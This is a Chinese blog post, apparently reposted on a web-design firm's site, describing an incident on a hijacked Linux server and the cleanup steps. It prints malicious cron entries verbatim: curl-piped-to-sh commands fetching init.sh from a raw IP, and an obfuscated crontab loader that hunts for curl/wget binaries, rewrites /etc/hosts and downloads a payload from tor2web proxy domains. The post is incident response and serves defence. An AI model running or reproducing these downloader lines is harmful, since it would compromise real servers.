现象:
安装成功了
创新互联主要从事成都做网站、成都网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务山阳,十年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:028-86922220
但是没多久又进来了
而且至今登录到系统来了
[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte
[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to " && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://7xffbbbebumizpeg";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm2";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
每分钟 nobody nginx apache用户 执行一次 下载脚本运行
干掉这个脚本,然后停止了crond服务 在var/log/cronrizhikli日志里面就没有异常下载脚本
还有这个异常
发现这里也有用户
打开crontab就一直在下载一分钟执行一次 
guoran果断删了 apache 和nobody 只剩下nginx一个在下载 但是 crontab -l也没发现啥异常
做最后终于找到恶意用户位置
直接全部删掉只留下root 最后恢复正常了
以后要重点关注登录系统用户情况
more /var/log/secure |grep Accepted
查询登录频繁用户
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail
.jpg)
文章名称:服务器crontab异常,疑是gongjiCPU异常
文章位置:
http://cdkjz.cn/article/jegesh.html
